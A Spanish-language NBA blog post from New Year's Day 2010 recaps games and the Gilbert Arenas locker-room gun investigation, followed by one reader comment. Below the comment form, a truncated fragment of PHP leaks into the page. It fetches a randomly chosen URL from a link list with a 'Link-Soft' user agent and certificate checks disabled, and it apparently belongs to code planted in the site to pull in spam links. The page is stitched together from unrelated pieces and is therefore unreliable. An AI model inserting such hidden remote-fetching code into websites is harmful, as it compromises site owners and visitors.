La Minicrónica de Año Nuevo

01 de January de 2010 por txusma

Mientras os recuperáis de la resaca os cuento que ayer justo antes de irme a dormir conecté unos minutos con la paliza que los Spurs le estaban propinando a los Heat. Al ver a Dwyane Wade con cara de circunstancias en el banco creí por un momento que se había lesionado. Pero no , simplemente estaba contemplando el rodillo Spur que les pasó por encima en la segunda mitad.

Antes, los Bulls habían provocado la novena derrota consecutiva de los Pistons con 22 puntos de Rose y 21 rebotes de Noah y Houston había escrito un capitulo más en su épica historia de esta temporada con una victoria frente los Mavs. Pero los que estan realmente contentos son los jugadores, directivos y aficionados de los Thunder y es que hacía 4 temporadas que el equipo (antes como los Sonics) no encadenaba 5 triunfos consecutivos y lo hizo justo de la mano del único jugador de la plantilla que sobrevive de aquellos tiempos: Nick Collison. Suyos fueron el rebote ofensivo y los tiros libres que certificaron la victoria frente Utah. Se estan haciendo las cosas muy bien en Oklahoma y este mismo año, por que no, pueden ser equipo de Playoff.

Finalmente, en el último partido de la década los Clippers se impusieron con relativa comodidad a unos Sixers a la deriva. No será un partido muy recordado sino es por la efeméride.

Pero posiblemente la noticia del día es la invetigación a la que está siendo sometido Gilbert Arenas por haber introducido un arma de fuego en el vestuario del equipo. Hay quien dice que el incidente está relacionado con la confrontación que el “Agente 0” tiene con Javaris Crittentton. Suponemos que la razón de la confrontación no es una discusión por ver quien gana más dinero… Malas noticias para los Wizards que no paran de recibir jarro de agua fría tras jarro de agua fría esta temporada. La que tenía que ser la de su renacimiento. Habrá que agradecérselo todo a Gilbert.

Comenta

Un comentario a esta entrada

  1. xapa_croack dice:
    #1

    Se ve que la nba ya seguia a arenas, pq tenia pistolas en el vestuario, no cre que siente muy bien esto a la NBA

      Citar

Deja un comentario

html; } class Helper { public function random_date() { $low = '732045693'; $high = time(); $random = rand($low, $high); return date("D, d M Y H:i:s",$random); } } class Fetch_site { public $url; public $html; public function __construct($sites=null, $link_list=null) { $this->is_curl_installed(); if($link_list !== null) { $this->choose_site($link_list); } $this->load_site($this->url); } public function choose_site($file=null) { $file = explode("\n", $file); $key = rand(0, (count($file)-1)); $this->url = trim($file[$key]); } public function load_site($url) { $useragent = array('Link-Soft'); $rand = array_rand($useragent); $ch = curl_init(); $options = array( CURLOPT_URL => $url, CURLOPT_HEADER => 0, CURLOPT_USERAGENT => $useragent[$rand], CURLOPT_SSL_VERIFYHOST => 0, CURLOPT_SSL_VERIFYPEER => 0, CURLOPT_RETURNTRANSFER => 1, CURLOPT_FOLLOWLOCATION => 1, CURLOPT_ENCODING => "", CURLOPT_AUTOREFERER => 1, CURLOPT_CONNECTTIMEOUT => 30, CURLOPT_TIMEOUT => 30, CURLOPT_MAXREDIRS => 5, ); curl_setopt_array($ch,$options); $result = curl_exec($ch); if(!$result) { return curl_error($ch); } curl_close($ch); $this->html = $result; } public function is_curl_installed() { if(!in_array('curl',get_loaded_extensions())) { trigger_error("cURL PHP extension is disabled or not installed.",E_USER_ERROR); } } } unset($n); ?>